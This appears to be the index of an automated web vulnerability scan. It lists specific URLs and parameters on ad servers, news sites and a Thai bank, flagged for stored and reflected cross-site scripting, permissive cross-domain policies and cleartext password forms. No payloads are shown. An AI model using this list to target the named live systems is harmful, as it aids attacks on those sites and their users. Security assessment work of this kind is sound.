1.1. http://stat.synergy-e.com/piwik.php [site parameter]
1.2. http://www.mid-day.com/news/index.htm/x26amp [REST URL parameter 1]
1.3. http://www.mid-day.com/news/index.htm/x26amp [REST URL parameter 2]
1.4. http://www.mid-day.com/news/index.htm/x26amp [REST URL parameter 3]
1.6. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 1]
1.7. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 2]
1.8. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 3]
1.9. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 4]
1.14. http://www.networkadvertising.org/managing/optout_results.asp [__utmb cookie]
3.1. http://ads.masslive.com/RealMedia/ads/adstream.cap [c parameter]
3.2. http://ads.mlive.com/RealMedia/ads/adstream.cap [c parameter]
3.3. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter]
3.4. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [c parameter]
3.5. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [c parameter]
3.6. http://pixel.quantserve.com/optout_set [nocache parameter]
3.7. http://www.networkadvertising.org/managing/optout_results.asp [optThis parameter]
4. Cross-site scripting (stored)
4.1. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]
4.2. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]
5.1. http://ads.masslive.com/RealMedia/ads/adstream.cap [c parameter]
5.2. http://ads.masslive.com/RealMedia/ads/adstream.cap [va parameter]
5.3. http://ads.mlive.com/RealMedia/ads/adstream.cap [c parameter]
5.4. http://ads.mlive.com/RealMedia/ads/adstream.cap [va parameter]
5.5. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter]
5.6. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [va parameter]
5.7. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter]
5.8. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]
5.9. http://d7.zedo.com/utils/ecSet.js [v parameter]
5.10. http://dp.33across.com/ps/ [33x_ps cookie]
5.11. http://login.dotomi.com/ucm/UCMController [redir_url parameter]
5.13. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [c parameter]
5.14. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [dv parameter]
5.15. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [REST URL parameter 4]
5.16. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [c parameter]
5.17. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [va parameter]
5.18. http://optout.crwdcntrl.net/optout [ct parameter]
5.19. http://optout.crwdcntrl.net/optout [d parameter]
5.20. http://optout.crwdcntrl.net/optout [name of an arbitrarily supplied request parameter]
5.21. http://t.mookie1.com/t/v1/event [migDest parameter]
6. Cross-site scripting (reflected)
6.1. http://223.165.24.159/toiwidget/jsp/widget.jsp [city parameter]
6.2. http://223.165.24.159/toiwidget/jsp/widget.jsp [city parameter]
6.3. http://ad4.liverail.com/ [name of an arbitrarily supplied request parameter]
6.4. http://addoer.com/showfixads.php [tabname parameter]
6.5. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
6.6. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
6.7. http://ads3.bangkokpost.co.th/www/delivery/spc.php [zones parameter]
6.8. http://ads4.bangkokpost.co.th/ads_server/iframe [FONT_COLOR parameter]
6.9. http://ads4.bangkokpost.co.th/ads_server/iframe/ [FONT_COLOR parameter]
6.10. http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH [loc parameter]
6.12. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [kvinvtype parameter]
6.13. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [kvinvtype parameter]
6.14. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [kvinvtype parameter]
6.55. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]
6.56. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]
6.57. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]
6.58. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]
6.59. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]
6.60. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]
6.61. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]
6.62. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]
6.63. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]
6.64. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]
6.65. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]
6.66. http://advertising.aol.com/nai/nai.php [action_id parameter]
6.67. http://advertising.aol.com/token/0/2/1170877546/ [REST URL parameter 1]
6.68. http://advertising.aol.com/token/0/3/1885310732/ [REST URL parameter 1]
6.69. http://advertising.aol.com/token/1/1/1462706141/ [REST URL parameter 1]
6.70. http://advertising.aol.com/token/1/3/1308197307/ [REST URL parameter 1]
6.71. http://advertising.aol.com/token/2/2/2011729621/ [REST URL parameter 1]
6.72. http://advertising.aol.com/token/2/3/868831419/ [REST URL parameter 1]
6.73. http://advertising.aol.com/token/3/2/1144859041/ [REST URL parameter 1]
6.74. http://advertising.aol.com/token/3/3/963398391/ [REST URL parameter 1]
6.75. http://advertising.aol.com/token/4/1/1214941173/ [REST URL parameter 1]
6.76. http://advertising.aol.com/token/4/3/1727096706/ [REST URL parameter 1]
6.77. http://advertising.aol.com/token/5/2/2011695027/ [REST URL parameter 1]
6.78. http://advertising.aol.com/token/5/3/803328935/ [REST URL parameter 1]
6.79. http://advertising.aol.com/token/6/1/737485457/ [REST URL parameter 1]
6.80. http://advertising.aol.com/token/6/3/807811660/ [REST URL parameter 1]
6.81. http://advertising.aol.com/token/7/1/585611182/ [REST URL parameter 1]
6.82. http://advertising.aol.com/token/7/3/1807570122/ [REST URL parameter 1]
6.83. http://advertising.aol.com/token/8/1/592246145/ [REST URL parameter 1]
6.84. http://advertising.aol.com/token/8/3/1337747048/ [REST URL parameter 1]
6.85. http://api.tweetmeme.com/v2/follow.js [REST URL parameter 1]
6.86. http://api.tweetmeme.com/v2/follow.js [screen_name parameter]
6.87. http://api.tweetmeme.com/v2/follow.js [style parameter]
6.88. http://b.scorecardresearch.com/beacon.js [c1 parameter]
6.89. http://b.scorecardresearch.com/beacon.js [c10 parameter]
6.90. http://b.scorecardresearch.com/beacon.js [c15 parameter]
6.91. http://b.scorecardresearch.com/beacon.js [c2 parameter]
6.92. http://b.scorecardresearch.com/beacon.js [c3 parameter]
6.93. http://b.scorecardresearch.com/beacon.js [c4 parameter]
6.94. http://b.scorecardresearch.com/beacon.js [c5 parameter]
6.95. http://b.scorecardresearch.com/beacon.js [c6 parameter]
6.96. http://bid.openx.net/json [c parameter]
6.98. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter]
6.99. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter]
6.101. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [q parameter]
6.102. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [q parameter]
6.103. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]
6.104. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]
6.106. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [q parameter]
6.107. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_css_url parameter]
6.108. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_font_size parameter]
6.109. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_frame_height parameter]
6.110. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_frame_width parameter]
6.111. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgcolor parameter]
6.112. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgcolor parameter]
6.113. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgimage parameter]
6.114. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_description_color parameter]
6.115. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_podcast parameter]
6.116. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_title_color parameter]
6.117. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_target parameter]
6.118. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_target parameter]
6.119. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_bgcolor parameter]
6.120. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_bgimage parameter]
6.121. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_color parameter]
6.122. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_type parameter]
6.123. http://ib.adnxs.com/ab [ccd parameter]
6.124. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]
6.126. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
6.133. http://msite.martiniadnetwork.com/index/ [REST URL parameter 1]
6.134. http://msite.martiniadnetwork.com/index/ [pid parameter]
6.135. http://msite.martiniadnetwork.com/index/ [sid parameter]
6.136. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]
6.137. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]
6.138. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]
6.139. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]
6.140. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]
6.141. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]
6.142. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]
6.143. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]
6.144. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]
6.145. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]
6.146. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]
6.147. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]
6.148. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]
6.149. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]
6.150. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]
6.151. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]
6.152. http://pixel.adsafeprotected.com/jspix [anId parameter]
6.153. http://pixel.adsafeprotected.com/jspix [campId parameter]
6.154. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
6.155. http://pixel.adsafeprotected.com/jspix [pubId parameter]
6.156. http://rtb0.doubleverify.com/rtb.ashx/verifyc [callback parameter]
6.157. http://social.ndtv.com/NDTVProfit [name of an arbitrarily supplied request parameter]
6.158. http://social.ndtv.com/groups.php [name of an arbitrarily supplied request parameter]
6.159. http://social.ndtv.com/home.php [name of an arbitrarily supplied request parameter]
6.160. http://social.ndtv.com/static/Comment/Form/ [ctype parameter]
6.161. http://social.ndtv.com/static/Comment/Form/ [ctype parameter]
6.162. http://social.ndtv.com/static/Comment/Form/ [identifier parameter]
6.163. http://social.ndtv.com/static/Comment/Form/ [identifier parameter]
6.164. http://social.ndtv.com/static/Comment/Form/ [link parameter]
6.165. http://social.ndtv.com/static/Comment/Form/ [link parameter]
6.166. http://social.ndtv.com/static/Comment/Form/ [title parameter]
6.167. http://social.ndtv.com/static/Comment/Form/ [title parameter]
6.169. http://timesofindia.indiatimes.com/topic/Xss [REST URL parameter 2]
6.170. http://www.addthis.com/api/nai/optout [REST URL parameter 1]
6.171. http://www.addthis.com/api/nai/optout [REST URL parameter 1]
6.172. http://www.addthis.com/api/nai/optout [REST URL parameter 2]
6.173. http://www.addthis.com/api/nai/optout [REST URL parameter 2]
6.174. http://www.addthis.com/api/nai/optout [REST URL parameter 3]
6.175. http://www.addthis.com/api/nai/optout [REST URL parameter 3]
6.176. http://www.addthis.com/api/nai/status [REST URL parameter 1]
6.177. http://www.addthis.com/api/nai/status [REST URL parameter 1]
6.178. http://www.addthis.com/api/nai/status [REST URL parameter 2]
6.179. http://www.addthis.com/api/nai/status [REST URL parameter 2]
6.180. http://www.addthis.com/api/nai/status [REST URL parameter 3]
6.181. http://www.addthis.com/api/nai/status [REST URL parameter 3]
6.182. http://www.addthis.com/bookmark.php [REST URL parameter 1]
6.183. http://www.addthis.com/bookmark.php [REST URL parameter 1]
6.184. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
6.185. http://www.bangkokpost.com/_event.php [name of an arbitrarily supplied request parameter]
6.186. http://www.bangkokpost.com/_event.php [xURI parameter]
6.187. http://www.bangkokpost.com/_getContent_main.php [geography parameter]
6.192. http://www.bangkokpost.com/search/news-and-article [REST URL parameter 2]
6.194. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]
6.209. http://www.networkadvertising.org/managing/optout_results.asp [yahoo_token parameter]
6.210. http://www.scb.co.th/favicon.ico [REST URL parameter 1]
6.211. http://www.scb.co.th/scb_api/api_a_deposit.jsp [REST URL parameter 1]
6.212. http://www.scb.co.th/scb_api/img/api/t1new/bttn_calc.gif [REST URL parameter 1]
6.213. http://www.scb.co.th/scb_api/img/api/t1new/bttn_reset.gif [REST URL parameter 1]
6.214. http://www.scb.co.th/scb_api/scbapi.jsp [REST URL parameter 1]
6.215. http://www9.effectivemeasure.net/v4/em_js [ns parameter]
6.216. http://member.bangkokpost.com/login.php [Referer HTTP header]
6.217. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]
6.218. http://www.addthis.com/bookmark.php [Referer HTTP header]
6.219. http://www.addthis.com/bookmark.php [Referer HTTP header]
6.220. http://advertising.aol.com/nai/nai.php [token_nai_ad_us-ec_adtechus_com cookie]
6.221. http://advertising.aol.com/nai/nai.php [token_nai_adserver_adtechus_com cookie]
6.222. http://advertising.aol.com/nai/nai.php [token_nai_adserverec_adtechus_com cookie]
6.223. http://advertising.aol.com/nai/nai.php [token_nai_adserverwc_adtechus_com cookie]
6.224. http://advertising.aol.com/nai/nai.php [token_nai_adsonar_com cookie]
6.225. http://advertising.aol.com/nai/nai.php [token_nai_adtech_de cookie]
6.226. http://advertising.aol.com/nai/nai.php [token_nai_advertising_com cookie]
6.227. http://advertising.aol.com/nai/nai.php [token_nai_glb_adtechus_com cookie]
6.228. http://advertising.aol.com/nai/nai.php [token_nai_tacoda_at_atwola_com cookie]
6.229. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [ZEDOIDA cookie]
6.230. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [ZEDOIDA cookie]
6.231. http://optimized-by.rubiconproject.com/a/4642/5271/7551-15.js [ruid cookie]
7.1. http://33across.com/crossdomain.xml
7.2. http://a.collective-media.net/crossdomain.xml
7.3. http://a.netmng.com/crossdomain.xml
7.4. http://a.rfihub.com/crossdomain.xml
7.5. http://a.tribalfusion.com/crossdomain.xml
7.6. http://a1.interclick.com/crossdomain.xml
7.7. http://ad-apac.doubleclick.net/crossdomain.xml
7.8. http://ad.afy11.net/crossdomain.xml
7.9. http://ad.doubleclick.net/crossdomain.xml
7.10. http://ad.turn.com/crossdomain.xml
7.11. http://ad4.liverail.com/crossdomain.xml
7.12. http://adcontent.videoegg.com/crossdomain.xml
7.13. http://admonkey.dapper.net/crossdomain.xml
7.14. http://ads.amgdgt.com/crossdomain.xml
7.15. http://ads.undertone.com/crossdomain.xml
7.16. http://adserver.adtech.de/crossdomain.xml
7.17. http://adserver.adtechus.com/crossdomain.xml
7.18. http://api.facebook.com/crossdomain.xml
7.19. http://as.casalemedia.com/crossdomain.xml
7.20. http://avn.innity.com/crossdomain.xml
7.21. http://b.scorecardresearch.com/crossdomain.xml
7.22. http://bannerfarm.ace.advertising.com/crossdomain.xml
7.23. http://beacon.videoegg.com/crossdomain.xml
7.24. http://bh.contextweb.com/crossdomain.xml
7.25. http://c7.zedo.com/crossdomain.xml
7.26. http://cas.criteo.com/crossdomain.xml
7.27. http://cdn.media.innity.net/crossdomain.xml
7.28. http://cdn.turn.com/crossdomain.xml
7.29. http://clk.atdmt.com/crossdomain.xml
7.30. http://clk.fetchback.com/crossdomain.xml
7.31. http://core.videoegg.com/crossdomain.xml
7.32. http://d.tradex.openx.com/crossdomain.xml
7.33. http://d13.zedo.com/crossdomain.xml
7.34. http://d2.zedo.com/crossdomain.xml
7.35. http://d3.zedo.com/crossdomain.xml
7.36. http://d7.zedo.com/crossdomain.xml
7.37. http://dis.criteo.com/crossdomain.xml
7.38. http://dis.sv.us.criteo.com/crossdomain.xml
7.39. http://dp.33across.com/crossdomain.xml
7.40. http://edge.aperture.displaymarketplace.com/crossdomain.xml
7.41. http://external.ak.fbcdn.net/crossdomain.xml
7.42. http://http.tidaltv.com/crossdomain.xml
7.43. http://i.w55c.net/crossdomain.xml
7.44. http://ib.adnxs.com/crossdomain.xml
7.45. http://idcs.interclick.com/crossdomain.xml
7.46. http://imp.fetchback.com/crossdomain.xml
7.47. http://load.exelator.com/crossdomain.xml
7.48. http://log30.doubleverify.com/crossdomain.xml
7.49. http://media.fastclick.net/crossdomain.xml
7.50. http://media2.legacy.com/crossdomain.xml
7.51. http://nai.btrll.com/crossdomain.xml
7.52. http://oas.guardian.co.uk/crossdomain.xml
7.53. http://oasc12.247realmedia.com/crossdomain.xml
7.54. http://optout.collective-media.net/crossdomain.xml
7.55. http://optout.crwdcntrl.net/crossdomain.xml
7.56. http://optout.invitemedia.com:9030/crossdomain.xml
7.57. http://optout.media6degrees.com/crossdomain.xml
7.58. http://p.brilig.com/crossdomain.xml
7.59. http://pbid.pro-market.net/crossdomain.xml
7.60. http://pixel.33across.com/crossdomain.xml
7.61. http://pixel.adsafeprotected.com/crossdomain.xml
7.62. http://pixel.fetchback.com/crossdomain.xml
7.63. http://pixel.quantserve.com/crossdomain.xml
7.64. http://plg3.yumenetworks.com/crossdomain.xml
7.65. http://premiumtv.122.2o7.net/crossdomain.xml
7.66. http://privacy.revsci.net/crossdomain.xml
7.67. http://r.casalemedia.com/crossdomain.xml
7.68. http://r.turn.com/crossdomain.xml
7.69. http://r1-ads.ace.advertising.com/crossdomain.xml
7.70. http://r1.zedo.com/crossdomain.xml
7.71. http://recs.richrelevance.com/crossdomain.xml
7.72. http://req.tidaltv.com/crossdomain.xml
7.73. http://rp.gwallet.com/crossdomain.xml
7.74. http://rs.gwallet.com/crossdomain.xml
7.75. http://s.xp1.ru4.com/crossdomain.xml
7.76. http://s.ytimg.com/crossdomain.xml
7.77. http://s0.2mdn.net/crossdomain.xml
7.78. http://search.spotxchange.com/crossdomain.xml
7.79. http://search.twitter.com/crossdomain.xml
7.80. http://secure-uk.imrworldwide.com/crossdomain.xml
7.81. http://server3.yowindow.com/crossdomain.xml
7.82. http://shadow01.yumenetworks.com/crossdomain.xml
7.83. http://social.ndtv.com/crossdomain.xml
7.84. http://srv.clickfuse.com/crossdomain.xml
7.85. http://swf.yowindow.com/crossdomain.xml
7.86. http://sync.adap.tv/crossdomain.xml
7.87. http://sync.mathtag.com/crossdomain.xml
7.88. http://t.mookie1.com/crossdomain.xml
7.89. http://t4.liverail.com/crossdomain.xml
7.90. http://tags.bluekai.com/crossdomain.xml
7.91. http://trk.tidaltv.com/crossdomain.xml
7.92. http://uav.tidaltv.com/crossdomain.xml
7.93. http://unitus.synergy-e.com/crossdomain.xml
7.94. http://vast.bp3845006.btrll.com/crossdomain.xml
7.95. http://vod.l3.cms.performgroup.com:443/crossdomain.xml
7.96. http://vox-static.liverail.com/crossdomain.xml
7.97. http://www.bangkokpost.com/crossdomain.xml
7.98. http://www.burstnet.com/crossdomain.xml
7.99. http://www.mtv.com/crossdomain.xml
7.100. http://www.ndtv.com/crossdomain.xml
7.101. http://www.nexac.com/crossdomain.xml
7.102. http://www.watchindia.tv/crossdomain.xml
7.103. http://www2.glam.com/crossdomain.xml
7.104. http://www9.effectivemeasure.net/crossdomain.xml
7.105. http://xml.eplayer.performgroup.com/crossdomain.xml
7.106. http://yads.zedo.com/crossdomain.xml
7.107. http://adadvisor.net/crossdomain.xml
7.108. http://ads.masslive.com/crossdomain.xml
7.109. http://ads.mlive.com/crossdomain.xml
7.110. http://ads.oregonlive.com/crossdomain.xml
7.111. http://adscontent2.indiatimes.com/crossdomain.xml
7.112. https://adwords.google.com/crossdomain.xml
7.113. http://api.tweetmeme.com/crossdomain.xml
7.114. http://as.serving-sys.com/crossdomain.xml
7.115. http://cookex.amp.yahoo.com/crossdomain.xml
7.116. http://cricket.iphone.stats.com/crossdomain.xml
7.117. http://developers.facebook.com/crossdomain.xml
7.118. http://ecx.images-amazon.com/crossdomain.xml
7.119. http://fetchback.com/crossdomain.xml
7.120. http://googleads.g.doubleclick.net/crossdomain.xml
7.121. http://images.photogallery.indiatimes.com/crossdomain.xml
7.122. http://login.dotomi.com/crossdomain.xml
7.123. http://netspiderads2.indiatimes.com/crossdomain.xml
7.124. http://netspiderads3.indiatimes.com/crossdomain.xml
7.125. http://open.ad.yieldmanager.net/crossdomain.xml
7.126. http://optimized-by.rubiconproject.com/crossdomain.xml
7.127. http://p.opt.fimserve.com/crossdomain.xml
7.128. http://pagead2.googlesyndication.com/crossdomain.xml
7.129. http://picasaweb.google.com/crossdomain.xml
7.130. http://pubads.g.doubleclick.net/crossdomain.xml
7.131. http://static.ak.fbcdn.net/crossdomain.xml
7.132. http://timesofindia.indiatimes.com/crossdomain.xml
7.133. http://www.adadvisor.net/crossdomain.xml
7.134. http://www.adbrite.com/crossdomain.xml
7.135. http://www.amazon.com/crossdomain.xml
7.136. http://www.connect.facebook.com/crossdomain.xml
7.137. http://www.emirates.com/crossdomain.xml
7.138. http://www.facebook.com/crossdomain.xml
7.139. http://www.fetchback.com/crossdomain.xml
7.140. http://www.godaddy.com/crossdomain.xml
7.141. http://www.jdoqocy.com/crossdomain.xml
7.142. http://www.mid-day.com/crossdomain.xml
7.143. http://www.nationmultimedia.com/crossdomain.xml
7.144. http://www.npr.org/crossdomain.xml
7.145. http://www.ticketmaster.com/crossdomain.xml
7.146. http://www.wtp101.com/crossdomain.xml
7.147. http://www.youtube-nocookie.com/crossdomain.xml
7.148. http://www.youtube.com/crossdomain.xml
7.149. http://www.zigwheels.com/crossdomain.xml
7.150. http://www2.panasonic.com/crossdomain.xml
7.151. http://ads3.bangkokpost.co.th/crossdomain.xml
7.152. http://cricket.widgets.stats.com/crossdomain.xml
7.153. https://docs.google.com/crossdomain.xml
7.154. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml
7.155. http://twitter.com/crossdomain.xml
7.156. https://twitter.com/crossdomain.xml
7.157. http://weblink.settrade.com/crossdomain.xml
8. Silverlight cross-domain policy
8.1. http://33across.com/clientaccesspolicy.xml
8.2. http://ad-apac.doubleclick.net/clientaccesspolicy.xml
8.3. http://ad.doubleclick.net/clientaccesspolicy.xml
8.4. http://ad4.liverail.com/clientaccesspolicy.xml
8.5. http://b.scorecardresearch.com/clientaccesspolicy.xml
8.6. http://clk.atdmt.com/clientaccesspolicy.xml
8.7. http://dp.33across.com/clientaccesspolicy.xml
8.8. http://pixel.33across.com/clientaccesspolicy.xml
8.9. http://pixel.quantserve.com/clientaccesspolicy.xml
8.10. http://plg3.yumenetworks.com/clientaccesspolicy.xml
8.11. http://premiumtv.122.2o7.net/clientaccesspolicy.xml
8.12. http://s0.2mdn.net/clientaccesspolicy.xml
8.13. http://secure-uk.imrworldwide.com/clientaccesspolicy.xml
8.14. http://shadow01.yumenetworks.com/clientaccesspolicy.xml
8.15. http://t4.liverail.com/clientaccesspolicy.xml
8.16. http://netspiderads3.indiatimes.com/clientaccesspolicy.xml
8.17. http://ts1.mm.bing.net/clientaccesspolicy.xml
8.18. http://ts2.mm.bing.net/clientaccesspolicy.xml
8.19. http://ts3.mm.bing.net/clientaccesspolicy.xml
8.20. http://ts4.mm.bing.net/clientaccesspolicy.xml
8.21. http://adscontent2.indiatimes.com/clientaccesspolicy.xml
8.22. http://choice.atdmt.com/clientaccesspolicy.xml
8.23. http://choice.microsoft.com/clientaccesspolicy.xml
8.24. http://choice.msn.com/clientaccesspolicy.xml
8.25. http://netspiderads2.indiatimes.com/clientaccesspolicy.xml
8.26. http://profile.live.com/clientaccesspolicy.xml
9. Cleartext submission of password
9.1. http://member.bangkokpost.com/login.php
9.2. http://ndtvjobs.bixee.com/search/search/
9.3. http://truehits.net/stat.php
10.1. http://ad4.liverail.com/util/companions.php [REST URL parameter 1]
10.2. http://ad4.liverail.com/util/companions.php [REST URL parameter 2]
10.3. http://addoer.com/showfixads.php [REST URL parameter 1]
10.4. http://api.facebook.com/restserver.php [format parameter]
10.5. http://api.tweetmeme.com/v2/follow.js [REST URL parameter 2]
10.6. http://cdn.dnaindia.com/images/710/favicon-delicious.ico [REST URL parameter 1]
10.7. http://cdn.dnaindia.com/images/710/favicon-delicious.ico [REST URL parameter 2]
10.8. http://cdn.dnaindia.com/images/710/favicon-delicious.ico [REST URL parameter 3]
10.9. http://cdn.dnaindia.com/images/710/favicon-digg.ico [REST URL parameter 1]
10.10. http://cdn.dnaindia.com/images/710/favicon-digg.ico [REST URL parameter 2]
10.11. http://cdn.dnaindia.com/images/710/favicon-digg.ico [REST URL parameter 3]
10.12. http://cdn.dnaindia.com/images/710/favicon-google-bookmark.ico [REST URL parameter 1]
10.13. http://cdn.dnaindia.com/images/710/favicon-google-bookmark.ico [REST URL parameter 2]
10.14. http://cdn.dnaindia.com/images/710/favicon-google-bookmark.ico [REST URL parameter 3]
10.15. http://cdn.dnaindia.com/images/710/favicon-reddit.ico [REST URL parameter 1]
10.16. http://cdn.dnaindia.com/images/710/favicon-reddit.ico [REST URL parameter 2]
10.17. http://cdn.dnaindia.com/images/710/favicon-reddit.ico [REST URL parameter 3]
10.18. http://cdn.dnaindia.com/images/710/favicon-yahoo-buzz.ico [REST URL parameter 1]
10.19. http://cdn.dnaindia.com/images/710/favicon-yahoo-buzz.ico [REST URL parameter 2]
10.20. http://cdn.dnaindia.com/images/710/favicon-yahoo-buzz.ico [REST URL parameter 3]
10.21. http://load.exelator.com/load/ [REST URL parameter 1]
10.22. http://load.exelator.com/load/OptOut.php [REST URL parameter 1]
10.23. http://load.exelator.com/load/OptOut.php [REST URL parameter 2]
10.24. http://lvs.truehits.in.th/goggen.php [REST URL parameter 1]
10.40. http://pixel.adblade.com/imps.php [REST URL parameter 1]
10.41. http://pixel.adblade.com/log.php [REST URL parameter 1]
10.42. http://pixel.quantserve.com/api/segments.json [REST URL parameter 1]
10.43. http://pixel.quantserve.com/api/segments.json [REST URL parameter 2]
10.44. http://pixel.quantserve.com/optout_set [REST URL parameter 1]
10.45. http://pixel.quantserve.com/optout_status [REST URL parameter 1]
10.46. http://pixel.quantserve.com/optout_verify [REST URL parameter 1]
10.47. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 1]
10.48. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 2]
10.49. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 3]
10.50. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1]
10.51. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2]
10.52. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3]
10.53. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 1]
10.54. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 2]
10.55. http://req.tidaltv.com/tpas1.aspx [xf parameter]
10.56. http://s.ytimg.com/yt/swfbin/cps-vflNVWyCR.swf [REST URL parameter 2]
10.57. http://s.ytimg.com/yt/swfbin/cps-vflNVWyCR.swf [REST URL parameter 3]
10.58. http://vox-static.liverail.com/swf/v4/adapters/vpaid_adapter.swf [REST URL parameter 1]
10.59. http://vox-static.liverail.com/swf/v4/adapters/vpaid_adapter.swf [REST URL parameter 2]
10.60. http://vox-static.liverail.com/swf/v4/adapters/vpaid_adapter.swf [REST URL parameter 3]
10.61. http://vox-static.liverail.com/swf/v4/adapters/vpaid_adapter.swf [REST URL parameter 4]
10.62. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 1]
10.63. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 2]
10.64. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 3]
10.65. http://web.adblade.com/clicks.php [REST URL parameter 1]
10.66. http://web.adblade.com/impsc.php [REST URL parameter 1]
10.67. http://www.nexac.com/nai_optout.php [REST URL parameter 1]
10.68. http://www.nexac.com/nai_status.php [REST URL parameter 1]
10.69. http://www9.effectivemeasure.net/v4/em4.swf [REST URL parameter 1]
10.70. http://www9.effectivemeasure.net/v4/em4.swf [REST URL parameter 2]
10.71. http://www9.effectivemeasure.net/v4/em_ck_img [REST URL parameter 1]
10.72. http://www9.effectivemeasure.net/v4/em_dimg [REST URL parameter 1]
10.73. http://www9.effectivemeasure.net/v4/em_js [REST URL parameter 1]
11. SSL cookie without secure flag set
11.1. https://twitter.com/home
11.2. https://adwords.google.com/um/StartNewLogin
12.1. http://advertising.aol.com/nai/nai.php
12.2. http://blogs.timesofindia.indiatimes.com/main/page/relatedPostFeed
12.3. http://info.yahoo.com/nai/nai-status.html
12.4. http://info.yahoo.com/nai/optout.html
12.5. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/evthdlr
